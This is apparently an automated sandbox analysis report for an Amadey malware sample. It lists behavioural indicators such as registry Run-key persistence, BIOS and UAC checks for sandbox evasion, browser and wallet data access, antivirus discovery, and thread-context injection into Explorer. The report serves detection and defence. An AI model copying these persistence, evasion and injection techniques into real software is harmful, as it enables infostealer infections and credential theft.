amadey | 6cbb4380d880c6bab221c81122b32e225ebf224942191fb08df5df82f971864b

Processes:

msiexec.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\NTCTUVXP-27 = "C:\\Program Files (x86)\\Ent5pjl6\\configbdzhzl.exe"	msiexec.exe

Blocklisted process makes network request 64 IoCs

Processes:

MsiExec.exemsiexec.exe

flow	pid	process
555	5824	MsiExec.exe
559	5824	MsiExec.exe
561	5824	MsiExec.exe
563	5824	MsiExec.exe
564	5824	MsiExec.exe
565	5824	MsiExec.exe
567	5824	MsiExec.exe
569	5824	MsiExec.exe
574	5824	MsiExec.exe
575	5824	MsiExec.exe
577	5824	MsiExec.exe
578	5824	MsiExec.exe
581	5824	MsiExec.exe
582	5824	MsiExec.exe
584	5824	MsiExec.exe
585	5824	MsiExec.exe
587	5824	MsiExec.exe
589	5824	MsiExec.exe
590	5824	MsiExec.exe
591	5824	MsiExec.exe
593	5824	MsiExec.exe
594	5824	MsiExec.exe
596	5824	MsiExec.exe
598	5824	MsiExec.exe
599	5824	MsiExec.exe
600	5824	MsiExec.exe
605	5824	MsiExec.exe
611	5824	MsiExec.exe
612	5824	MsiExec.exe
613	5824	MsiExec.exe
615	5824	MsiExec.exe
616	1756	msiexec.exe
617	5824	MsiExec.exe
619	5824	MsiExec.exe
620	5824	MsiExec.exe
621	5824	MsiExec.exe
622	5824	MsiExec.exe
623	5824	MsiExec.exe
625	5824	MsiExec.exe
626	5824	MsiExec.exe
627	5824	MsiExec.exe
819	1756	msiexec.exe
939	1756	msiexec.exe
1106	1756	msiexec.exe
1309	1756	msiexec.exe
1462	1756	msiexec.exe
1760	1756	msiexec.exe
1842	1756	msiexec.exe
1896	1756	msiexec.exe
1976	1756	msiexec.exe
2048	1756	msiexec.exe
2066	1756	msiexec.exe
2107	1756	msiexec.exe
2116	1756	msiexec.exe
2272	1756	msiexec.exe
2289	1756	msiexec.exe
2297	1756	msiexec.exe
2297	1756	msiexec.exe
2420	1756	msiexec.exe
2440	1756	msiexec.exe
2545	1756	msiexec.exe
3318	1756	msiexec.exe
3512	1756	msiexec.exe
3532	1756	msiexec.exe

Downloads MZ/PE file

Drops file in Drivers directory 5 IoCs

Processes:

DYbALA.exeDYbALA.exeDrvInst.exe

description	ioc	process
File opened for modification	C:\Windows\system32\drivers\etc\hosts	DYbALA.exe
File opened for modification	C:\Windows\system32\drivers\etc\hosts	DYbALA.exe
File opened for modification	C:\Windows\System32\drivers\SETF61C.tmp	DrvInst.exe
File created	C:\Windows\System32\drivers\SETF61C.tmp	DrvInst.exe
File opened for modification	C:\Windows\System32\drivers\tap0901.sys	DrvInst.exe

Executes dropped EXE 64 IoCs

Processes:

setup_installer.exesetup_install.exeMon178e7a516181.exeMon17870faab0.exeMon1708beae021a5ff.exeMon174a6c5f1664f.exeMon179f74c0ff3cf1f.exeMon178d8e5d06822.exeMon17bffc2992eb3d.exeMon17a0d8ec302e.exeMon17afe24e0084db3.exeMon1727c156c4abcec.exeMon173a360b525.exeMon17332e41e6b.exeMon175e6c8b40064b8c8.exeMon17bbf11fdb575d.exeMon17bbf11fdb575d.tmpMon17bbf11fdb575d.exeMon17afe24e0084db3.exeMon17bbf11fdb575d.tmpcmd.exeMon1727c156c4abcec.exeMon174a6c5f1664f.exejc291e2_rKmoNAGsejPpE0Eu.exejc291e2_rKmoNAGsejPpE0Eu.exe3354555.exeMon174a6c5f1664f.exeDownFlSetup110.exe6jZhRtW.EXeinst1.exe238072.exeMon174a6c5f1664f.exeSoft1WW01.exechrome.exe_sJy72r15Io8hjMOpXHU3ng5.exeABB3.exeConhost.exeConhost.exebwkxPh1yL2Wkm1rmvTMe2VTO.exe_6or44rEubg9iZ3VdoaC4XXg.exeiYGd7u5Uk_Ib_3Gb94q_cYxs.exeGUJG8vfRqogim7xN2gxq4qxO.exeyOj1WECF7HJNMLcwMO9spdy6.exeMon174a6c5f1664f.exepostback.exe8326766.exef_qhca_mqGIJHx39G3hKWVKQ.exeFMTnjSf044j05Xl8dMd_dNnh.exeLsXhmWcRgskvDtebvUlqF8rc.exehkAZQUdE7y720uA2jdtj5skU.exeq2NUgOj7NxZeJYYXzRNGaWUt.exeConhost.exe1uT2d0BkeE_DJquEcpjI45YJ.exe75X59NlosCHoajTjpeDlodY1.exe75X59NlosCHoajTjpeDlodY1.exeGav9xdYNZl8Zb_Q49AqR0WeW.exeXOi6C0Ymdh5PqNsTC3JWe2Yq.exeJmrC_y7ZqnosVrDZc7UTR80C.exeadF6KxjhcOfjYh4ost48IawU.exeE_OHOPUQK1p49G7oDJQPE6PW.exeJmrC_y7ZqnosVrDZc7UTR80C.exeQFWlN69O9FNkcWfwdW6z88Ve.exechrome2.exe3515439.exe

pid	process
1692	setup_installer.exe
2488	setup_install.exe
3176	Mon178e7a516181.exe
4040	Mon17870faab0.exe
3788	Mon1708beae021a5ff.exe
1596	Mon174a6c5f1664f.exe
4376	Mon179f74c0ff3cf1f.exe
1260	Mon178d8e5d06822.exe
3160	Mon17bffc2992eb3d.exe
1460	Mon17a0d8ec302e.exe
4824	Mon17afe24e0084db3.exe
3216	Mon1727c156c4abcec.exe
932	Mon173a360b525.exe
720	Mon17332e41e6b.exe
1320	Mon175e6c8b40064b8c8.exe
5088	Mon17bbf11fdb575d.exe
2236	Mon17bbf11fdb575d.tmp
1980	Mon17bbf11fdb575d.exe
3600	Mon17afe24e0084db3.exe
2148	Mon17bbf11fdb575d.tmp
572	cmd.exe
4832	Mon1727c156c4abcec.exe
2844	Mon174a6c5f1664f.exe
2784	jc291e2_rKmoNAGsejPpE0Eu.exe
1732	jc291e2_rKmoNAGsejPpE0Eu.exe
4276	3354555.exe
2264	Mon174a6c5f1664f.exe
4788	DownFlSetup110.exe
4436	6jZhRtW.EXe
3260	inst1.exe
1692	238072.exe
408	Mon174a6c5f1664f.exe
5148	Soft1WW01.exe
5544	chrome.exe
5580	_sJy72r15Io8hjMOpXHU3ng5.exe
5592	ABB3.exe
5688	Conhost.exe
5700	Conhost.exe
5656	bwkxPh1yL2Wkm1rmvTMe2VTO.exe
5724	_6or44rEubg9iZ3VdoaC4XXg.exe
5680	iYGd7u5Uk_Ib_3Gb94q_cYxs.exe
5672	GUJG8vfRqogim7xN2gxq4qxO.exe
5660	yOj1WECF7HJNMLcwMO9spdy6.exe
5164	Mon174a6c5f1664f.exe
5572	postback.exe
5556	8326766.exe
5788	f_qhca_mqGIJHx39G3hKWVKQ.exe
5796	FMTnjSf044j05Xl8dMd_dNnh.exe
5804	LsXhmWcRgskvDtebvUlqF8rc.exe
5812	hkAZQUdE7y720uA2jdtj5skU.exe
5820	q2NUgOj7NxZeJYYXzRNGaWUt.exe
5836	Conhost.exe
5828	1uT2d0BkeE_DJquEcpjI45YJ.exe
5848	75X59NlosCHoajTjpeDlodY1.exe
5860	75X59NlosCHoajTjpeDlodY1.exe
5980	Gav9xdYNZl8Zb_Q49AqR0WeW.exe
6040	XOi6C0Ymdh5PqNsTC3JWe2Yq.exe
6032	JmrC_y7ZqnosVrDZc7UTR80C.exe
6064	adF6KxjhcOfjYh4ost48IawU.exe
6140	E_OHOPUQK1p49G7oDJQPE6PW.exe
3412	JmrC_y7ZqnosVrDZc7UTR80C.exe
5156	QFWlN69O9FNkcWfwdW6z88Ve.exe
5276	chrome2.exe
5752	3515439.exe

Checks BIOS information in registry 2 TTPs 22 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

Processes:

75X59NlosCHoajTjpeDlodY1.exeq2NUgOj7NxZeJYYXzRNGaWUt.exesihost64.exeFMTnjSf044j05Xl8dMd_dNnh.exe8326766.exebwkxPh1yL2Wkm1rmvTMe2VTO.exe75X59NlosCHoajTjpeDlodY1.exe16A5.exeiYGd7u5Uk_Ib_3Gb94q_cYxs.exe3518046.exe238072.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	75X59NlosCHoajTjpeDlodY1.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	q2NUgOj7NxZeJYYXzRNGaWUt.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	sihost64.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	FMTnjSf044j05Xl8dMd_dNnh.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	8326766.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	bwkxPh1yL2Wkm1rmvTMe2VTO.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	bwkxPh1yL2Wkm1rmvTMe2VTO.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	8326766.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	75X59NlosCHoajTjpeDlodY1.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	sihost64.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	16A5.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	iYGd7u5Uk_Ib_3Gb94q_cYxs.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	75X59NlosCHoajTjpeDlodY1.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	3518046.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	3518046.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	75X59NlosCHoajTjpeDlodY1.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	q2NUgOj7NxZeJYYXzRNGaWUt.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	16A5.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	238072.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	238072.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	FMTnjSf044j05Xl8dMd_dNnh.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	iYGd7u5Uk_Ib_3Gb94q_cYxs.exe

Loads dropped DLL 64 IoCs

Processes:

setup_install.exeMon17bbf11fdb575d.tmpMon17bbf11fdb575d.tmpWerFault.exeConhost.exeCalculator Installation.exerundll32.exeregsvr32.exesetup.exehkAZQUdE7y720uA2jdtj5skU.exeWBqf1wfQKQCPMmZBP5wnAft8.tmpConhost.exehkAZQUdE7y720uA2jdtj5skU.exesetup.exeWBqf1wfQKQCPMmZBP5wnAft8.tmprundll32.exesetup.exemsiexec.exemsiexec.exeConhost.exerundll32.exeinstaller.exeautosubplayer.exerundll32.exeMsiExec.exeCalculator.exeCalculator.exe

pid	process
2488	setup_install.exe
2488	setup_install.exe
2488	setup_install.exe
2488	setup_install.exe
2488	setup_install.exe
2488	setup_install.exe
2488	setup_install.exe
2488	setup_install.exe
2236	Mon17bbf11fdb575d.tmp
2148	Mon17bbf11fdb575d.tmp
1240	WerFault.exe
5952	Conhost.exe
5952	Conhost.exe
1468	Calculator Installation.exe
1468	Calculator Installation.exe
1468	Calculator Installation.exe
1468	Calculator Installation.exe
1468	Calculator Installation.exe
5952	Conhost.exe
4856	rundll32.exe
5364	regsvr32.exe
5952	Conhost.exe
5952	Conhost.exe
5360	setup.exe
5360	setup.exe
1368	hkAZQUdE7y720uA2jdtj5skU.exe
1368	hkAZQUdE7y720uA2jdtj5skU.exe
1176	WBqf1wfQKQCPMmZBP5wnAft8.tmp
1368	hkAZQUdE7y720uA2jdtj5skU.exe
6600	Conhost.exe
1368	hkAZQUdE7y720uA2jdtj5skU.exe
1368	hkAZQUdE7y720uA2jdtj5skU.exe
5812	hkAZQUdE7y720uA2jdtj5skU.exe
5812	hkAZQUdE7y720uA2jdtj5skU.exe
2992	setup.exe
2992	setup.exe
5500	WBqf1wfQKQCPMmZBP5wnAft8.tmp
5812	hkAZQUdE7y720uA2jdtj5skU.exe
5812	hkAZQUdE7y720uA2jdtj5skU.exe
5812	hkAZQUdE7y720uA2jdtj5skU.exe
1180	rundll32.exe
6112	setup.exe
6112	setup.exe
7100	msiexec.exe
7100	msiexec.exe
3372	msiexec.exe
3372	msiexec.exe
1336	Conhost.exe
236	rundll32.exe
3236	installer.exe
3236	installer.exe
5328	autosubplayer.exe
5328	autosubplayer.exe
3236	installer.exe
6152	rundll32.exe
2636	MsiExec.exe
2636	MsiExec.exe
5360	setup.exe
5360	setup.exe
8048	Calculator.exe
2992	setup.exe
5360	setup.exe
2992	setup.exe
8576	Calculator.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081

Adds Run key to start application 2 TTPs 13 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

Processes:

1702062.exeDYbALA.exesetup.exesetup.exeaipackagechainer.exeSettings%20Installation.exesetup.exemsedge.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Windows\CurrentVersion\Run\WinHost = "C:\\Users\\Admin\\AppData\\Roaming\\WinHost\\WinHoster.exe"	1702062.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\system recover = "\"C:\\Program Files (x86)\\Windows Photo Viewer\\Lyhuvaezhetu.exe\""	DYbALA.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Calculator = "C:\\Users\\Admin\\AppData\\Roaming\\Calculator\\Calculator.exe --ZgwMku75"	setup.exe
Key created	\REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run	setup.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Windows\CurrentVersion\Run\	aipackagechainer.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Settings = "C:\\Users\\Admin\\AppData\\Roaming\\Settings\\Settings.exe --ZgwMku75"	Settings%20Installation.exe
Key created	\REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run	setup.exe
Key created	\REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run	setup.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Calculator = "C:\\Users\\Admin\\AppData\\Roaming\\Calculator\\Calculator.exe --ZgwMku75"	setup.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Calculator = "C:\\Users\\Admin\\AppData\\Roaming\\Calculator\\Calculator.exe --ZgwMku75"	setup.exe
Key created	\REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Windows\CurrentVersion\Run	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Windows\CurrentVersion\Run	aipackagechainer.exe
Key created	\REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run	Settings%20Installation.exe

Checks for any installed AV software in registry 1 TTPs 2 IoCs

Security Software Discovery

T1063

Processes:

powershell.exepowershell.exe

description	ioc	process
Key opened	\REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\SOFTWARE\KasperskyLab	powershell.exe
Key opened	\REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\SOFTWARE\KasperskyLab	powershell.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Checks whether UAC is enabled 1 TTPs 12 IoCs

evasion trojan

System Information Discovery

Processes:

238072.exe75X59NlosCHoajTjpeDlodY1.exeq2NUgOj7NxZeJYYXzRNGaWUt.exejg1_1faf.exesihost64.exe16A5.exeFMTnjSf044j05Xl8dMd_dNnh.exeiYGd7u5Uk_Ib_3Gb94q_cYxs.exe75X59NlosCHoajTjpeDlodY1.exe8326766.exebwkxPh1yL2Wkm1rmvTMe2VTO.exe3518046.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	238072.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	75X59NlosCHoajTjpeDlodY1.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	q2NUgOj7NxZeJYYXzRNGaWUt.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	jg1_1faf.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	sihost64.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	16A5.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	FMTnjSf044j05Xl8dMd_dNnh.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	iYGd7u5Uk_Ib_3Gb94q_cYxs.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	75X59NlosCHoajTjpeDlodY1.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	8326766.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	bwkxPh1yL2Wkm1rmvTMe2VTO.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	3518046.exe

Enumerates connected drives 3 TTPs 64 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

Processes:

setting.exeinstaller.exemsiexec.exemsiexec.exeinstaller.exemsiexec.exeWerFault.exe

description	ioc	process
File opened (read-only)	\??\H:	setting.exe
File opened (read-only)	\??\X:	installer.exe
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\V:	setting.exe
File opened (read-only)	\??\W:	installer.exe
File opened (read-only)	\??\X:	msiexec.exe
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\G:	installer.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\A:	installer.exe
File opened (read-only)	\??\K:	installer.exe
File opened (read-only)	\??\Q:	installer.exe
File opened (read-only)	\??\U:	setting.exe
File opened (read-only)	\??\W:	setting.exe
File opened (read-only)	\??\T:	msiexec.exe
File opened (read-only)	\??\G:	installer.exe
File opened (read-only)	\??\L:	installer.exe
File opened (read-only)	\??\A:	installer.exe
File opened (read-only)	\??\M:	setting.exe
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\X:	msiexec.exe
File opened (read-only)	\??\Z:	WerFault.exe
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\I:	installer.exe
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\N:	installer.exe
File opened (read-only)	\??\Q:	setting.exe
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\Y:	msiexec.exe
File opened (read-only)	\??\B:	installer.exe
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\T:	msiexec.exe
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\O:	installer.exe
File opened (read-only)	\??\J:	setting.exe
File opened (read-only)	\??\X:	installer.exe
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\L:	installer.exe
File opened (read-only)	\??\X:	setting.exe
File opened (read-only)	\??\K:	installer.exe
File opened (read-only)	\??\S:	installer.exe
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\X:	msiexec.exe
File opened (read-only)	\??\H:	installer.exe
File opened (read-only)	\??\V:	installer.exe
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\S:	msiexec.exe
File opened (read-only)	\??\U:	installer.exe
File opened (read-only)	\??\R:	setting.exe
File opened (read-only)	\??\F:	installer.exe
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\M:	installer.exe
File opened (read-only)	\??\G:	setting.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\U:	installer.exe
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\I:	installer.exe
File opened (read-only)	\??\F:	setting.exe
File opened (read-only)	\??\W:	msiexec.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102
Looks up external IP address via web service 12 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

215 ipinfo.io
230 ipinfo.io
231 ipinfo.io
3558 ip-api.com
3 ipinfo.io
72 ipinfo.io
165 ipinfo.io
174 ipinfo.io
179 ip-api.com
37 ipinfo.io
45 ipinfo.io
46 ipinfo.io

flow	ioc
215	ipinfo.io
230	ipinfo.io
231	ipinfo.io
3558	ip-api.com
3	ipinfo.io
72	ipinfo.io
165	ipinfo.io
174	ipinfo.io
179	ip-api.com
37	ipinfo.io
45	ipinfo.io
46	ipinfo.io

Drops file in System32 directory 20 IoCs

Processes:

DrvInst.exerundll32.exetapinstall.exe

description	ioc	process
File opened for modification	C:\Windows\System32\DriverStore\Temp\{14a5d0b8-e571-1f4e-b55d-de073fbb1b4a}\tap0901.cat	DrvInst.exe
File created	C:\Windows\System32\DriverStore\Temp\{14a5d0b8-e571-1f4e-b55d-de073fbb1b4a}\SETE527.tmp	DrvInst.exe
File opened for modification	C:\Windows\System32\DriverStore\FileRepository\oemvista.inf_amd64_a572b7f20c402d28\oemvista.inf	DrvInst.exe
File opened for modification	C:\Windows\System32\DriverStore\Temp\{14a5d0b8-e571-1f4e-b55d-de073fbb1b4a}\SETE527.tmp	DrvInst.exe
File opened for modification	C:\Windows\System32\GroupPolicy	rundll32.exe
File opened for modification	C:\Windows\System32\GroupPolicy\gpt.ini	rundll32.exe
File created	C:\Windows\System32\GroupPolicy\Machine\Registry.pol	rundll32.exe
File opened for modification	C:\Windows\System32\DriverStore\Temp\{14a5d0b8-e571-1f4e-b55d-de073fbb1b4a}\oemvista.inf	DrvInst.exe
File opened for modification	C:\Windows\System32\DriverStore\Temp\{14a5d0b8-e571-1f4e-b55d-de073fbb1b4a}\SETE515.tmp	DrvInst.exe
File opened for modification	C:\Windows\System32\DriverStore\Temp\{14a5d0b8-e571-1f4e-b55d-de073fbb1b4a}\tap0901.sys	DrvInst.exe
File created	C:\Windows\System32\DriverStore\FileRepository\oemvista.inf_amd64_a572b7f20c402d28\oemvista.PNF	tapinstall.exe
File created	C:\Windows\System32\DriverStore\drvstore.tmp	DrvInst.exe
File opened for modification	C:\Windows\System32\DriverStore\FileRepository\oemvista.inf_amd64_a572b7f20c402d28\tap0901.sys	DrvInst.exe
File opened for modification	C:\Windows\System32\DriverStore\FileRepository\oemvista.inf_amd64_a572b7f20c402d28\tap0901.cat	DrvInst.exe
File opened for modification	C:\Windows\System32\CatRoot2\dberr.txt	DrvInst.exe
File opened for modification	C:\Windows\System32\GroupPolicy\GPT.INI	rundll32.exe
File created	C:\Windows\System32\DriverStore\Temp\{14a5d0b8-e571-1f4e-b55d-de073fbb1b4a}\SETE515.tmp	DrvInst.exe
File opened for modification	C:\Windows\System32\DriverStore\Temp\{14a5d0b8-e571-1f4e-b55d-de073fbb1b4a}\SETE526.tmp	DrvInst.exe
File created	C:\Windows\System32\DriverStore\Temp\{14a5d0b8-e571-1f4e-b55d-de073fbb1b4a}\SETE526.tmp	DrvInst.exe
File opened for modification	C:\Windows\System32\DriverStore\Temp\{14a5d0b8-e571-1f4e-b55d-de073fbb1b4a}	DrvInst.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 25 IoCs

Processes:

238072.exe75X59NlosCHoajTjpeDlodY1.exeiYGd7u5Uk_Ib_3Gb94q_cYxs.exebwkxPh1yL2Wkm1rmvTMe2VTO.exe75X59NlosCHoajTjpeDlodY1.exe8326766.exeq2NUgOj7NxZeJYYXzRNGaWUt.exe3518046.exesihost64.exebeadroll.exemask_svc.exemask_svc.exemask_svc.exe

pid	process
1692	238072.exe
5860	75X59NlosCHoajTjpeDlodY1.exe
5680	iYGd7u5Uk_Ib_3Gb94q_cYxs.exe
5656	bwkxPh1yL2Wkm1rmvTMe2VTO.exe
5848	75X59NlosCHoajTjpeDlodY1.exe
5556	8326766.exe
5820	q2NUgOj7NxZeJYYXzRNGaWUt.exe
6360	3518046.exe
6992	sihost64.exe
5968	beadroll.exe
5968	beadroll.exe
5968	beadroll.exe
5968	beadroll.exe
5968	beadroll.exe
5968	beadroll.exe
5968	beadroll.exe
5968	beadroll.exe
5968	beadroll.exe
5968	beadroll.exe
5968	beadroll.exe
5968	beadroll.exe
5968	beadroll.exe
5456	mask_svc.exe
7440	mask_svc.exe
2604	mask_svc.exe

Suspicious use of SetThreadContext 17 IoCs

Processes:

Mon1727c156c4abcec.exeMon174a6c5f1664f.exeE_OHOPUQK1p49G7oDJQPE6PW.exeadF6KxjhcOfjYh4ost48IawU.exeFMTnjSf044j05Xl8dMd_dNnh.exeyOj1WECF7HJNMLcwMO9spdy6.exeXOi6C0Ymdh5PqNsTC3JWe2Yq.exehkAZQUdE7y720uA2jdtj5skU.exemsiexec.exe6F64.exe16A5.exebeadroll.exe4112.exe5D56.execonhost.exe

description	pid	process	target process
PID 3216 set thread context of 4832	3216	Mon1727c156c4abcec.exe	Mon1727c156c4abcec.exe
PID 1596 set thread context of 5164	1596	Mon174a6c5f1664f.exe	Mon174a6c5f1664f.exe
PID 6140 set thread context of 3196	6140	E_OHOPUQK1p49G7oDJQPE6PW.exe	Explorer.EXE
PID 6064 set thread context of 3196	6064	adF6KxjhcOfjYh4ost48IawU.exe	Explorer.EXE
PID 5796 set thread context of 2068	5796	FMTnjSf044j05Xl8dMd_dNnh.exe	AppLaunch.exe
PID 5660 set thread context of 6424	5660	yOj1WECF7HJNMLcwMO9spdy6.exe	yOj1WECF7HJNMLcwMO9spdy6.exe
PID 6140 set thread context of 3196	6140	E_OHOPUQK1p49G7oDJQPE6PW.exe	Explorer.EXE
PID 6040 set thread context of 6552	6040	XOi6C0Ymdh5PqNsTC3JWe2Yq.exe	XOi6C0Ymdh5PqNsTC3JWe2Yq.exe
PID 5812 set thread context of 2664	5812	hkAZQUdE7y720uA2jdtj5skU.exe	XkYUSm_BYC_RZqlw0pSLKPVp.exe
PID 1756 set thread context of 3196	1756	msiexec.exe	Explorer.EXE
PID 6776 set thread context of 6704	6776	6F64.exe	6F64.exe
PID 2440 set thread context of 5912	2440	16A5.exe	AppLaunch.exe
PID 5968 set thread context of 6580	5968	beadroll.exe	regsvcs.exe
PID 4964 set thread context of 3116	4964	4112.exe	4112.exe
PID 6784 set thread context of 4048	6784	5D56.exe	5D56.exe
PID 2308 set thread context of 5644	2308	conhost.exe	explorer.exe
PID 1756 set thread context of 5644	1756	msiexec.exe	explorer.exe

Drops file in Program Files directory 64 IoCs

Processes:

autosubplayer.exelighteningplayer-cache-gen.exevpn.tmpautosubplayer.exedata_load.exejg1_1faf.exeDYbALA.exedata_load.exe

description	ioc	process
File opened for modification	C:\Program Files (x86)\lighteningplayer\lua\meta\art\00_musicbrainz.luac	autosubplayer.exe
File opened for modification	C:\Program Files (x86)\lighteningplayer\lua\playlist\anevia_streams.luac	autosubplayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\plugins.dat.7784	lighteningplayer-cache-gen.exe
File created	C:\Program Files (x86)\MaskVPN\is-H0SGC.tmp	vpn.tmp
File created	C:\Program Files (x86)\lighteningplayer\lua\meta\art\00_musicbrainz.luac	autosubplayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\control\libntservice_plugin.dll	autosubplayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\logger\libfile_logger_plugin.dll	autosubplayer.exe
File opened for modification	C:\Program Files (x86)\lighteningplayer\lua\http\dialogs\stream_config_window.html	autosubplayer.exe
File opened for modification	C:\Program Files (x86)\lighteningplayer\lua\http\requests\browse.xml	autosubplayer.exe
